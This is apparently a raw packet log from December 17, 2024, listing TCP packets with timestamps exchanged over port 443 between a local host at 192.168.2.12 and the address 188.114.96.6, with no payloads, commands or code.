                                                                        Dec 17, 2024 08:38:46.726537943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.726562977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.726603985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.726608992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.726648092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.730463982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.730489969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.730556965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.730564117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.730573893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.730602980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.735199928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.735225916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.735261917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.735271931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.735326052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.738749027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.738775015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.738818884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.738826036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.738857031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.738909960 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.743483067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.743509054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.743540049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.743545055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.743586063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.747368097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.747395039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.747436047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.747442007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.747472048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.747489929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.910141945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.910175085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.910232067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.910242081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.910295010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.914355993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.914376020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.914443970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.914450884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.914490938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.918289900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.918312073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.918344975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.918351889 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.918385983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.918407917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.922988892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.923007965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.923064947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.923070908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.923105955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.926875114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.926893950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.926974058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.926980019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.927043915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.931590080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.931611061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.931652069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.931658030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.931696892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.935163021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.935184002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.935230970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.935236931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.935264111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.935287952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.939954996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.939964056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.940047026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.940052986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.940092087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.102566004 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.102595091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.102638960 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.102650881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.102679014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.102703094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.106216908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.106240034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.106295109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.106301069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.106363058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.111097097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.111123085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.111160994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.111167908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.111274958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.114782095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.114806890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.114845991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.114854097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.114892006 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.114912033 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.119541883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.119570017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.119647026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.119656086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.119694948 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.123430967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.123454094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.123552084 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.123562098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.123605967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.127846003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.127868891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.127921104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.127928019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.127963066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.127984047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.132570028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.132594109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.132644892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.132651091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.132677078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.132700920 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.295059919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.295089006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.295227051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.295248985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.295332909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.298880100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.298902988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.299362898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.299371958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.299421072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.303585052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.303607941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.303746939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.303752899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.303833961 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.307471037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.307498932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.307607889 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.307615995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.307661057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.307661057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.312243938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.312274933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.312366962 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.312375069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.312421083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.316059113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.316082954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.316178083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.316188097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.316258907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.320533991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.320559025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.320677042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.320683002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.320759058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.325685978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.325711966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.325771093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.325776100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.325814009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.325834990 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.487262964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.487363100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.487369061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.487380028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.487528086 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.491533995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.491549969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.491621017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.491627932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.491691113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.495335102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.495349884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.495456934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.495464087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.495852947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.500159025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.500174999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.500246048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.500252962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.500397921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.504007101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.504025936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.504152060 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.504158974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.504292965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.508678913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.508697033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.508764029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.508769989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.508826971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.513148069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.513165951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.513221025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.513230085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.513545036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.517187119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.517206907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.517273903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.517282009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.517388105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.680006027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.680031061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.680098057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.680121899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.680165052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.680165052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.683870077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.683887959 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.683950901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.683963060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.684144020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.687695026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.687710047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.687931061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.687946081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.689169884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.692481041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.692502975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.692576885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.692584991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.692709923 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.696387053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.696403980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.696480989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.696496964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.696698904 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.701117992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.701133966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.701184034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.701199055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.701297998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.705514908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.705542088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.705662966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.705672026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.705962896 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.709363937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.709378958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.709428072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.709438086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.709530115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.871973038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.871997118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.872050047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.872064114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.872124910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.872124910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.876611948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.876631975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.876729965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.876741886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.876856089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.880651951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.880670071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.880734921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.880745888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.880799055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.885672092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.885694981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.885853052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.885860920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.886080027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.889122963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.889139891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.889218092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.889229059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.890064001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.893682957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.893702030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.893770933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.893795013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.893876076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.897465944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.897492886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.897576094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.897589922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.897675037 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.902194023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.902219057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.902275085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:47.902285099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:47.902339935 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.064753056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.064779997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.064855099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.064863920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.064881086 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.064944029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.068495035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.068510056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.068557978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.068566084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.068597078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.068644047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.073177099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.073191881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.073292971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.073292971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.073298931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.073379040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.077076912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.077099085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.077269077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.077275991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.077337980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.081844091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.081870079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.081953049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.081958055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.082005978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.082005978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.086275101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.086292982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.086393118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.086393118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.086400032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.086448908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.090164900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.090182066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.090365887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.090373993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.090786934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.094891071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.094908953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.095012903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.095012903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.095021009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.095065117 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.259511948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.259538889 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.259629965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.259640932 CET44349716188.114.96.6192.168.2.12
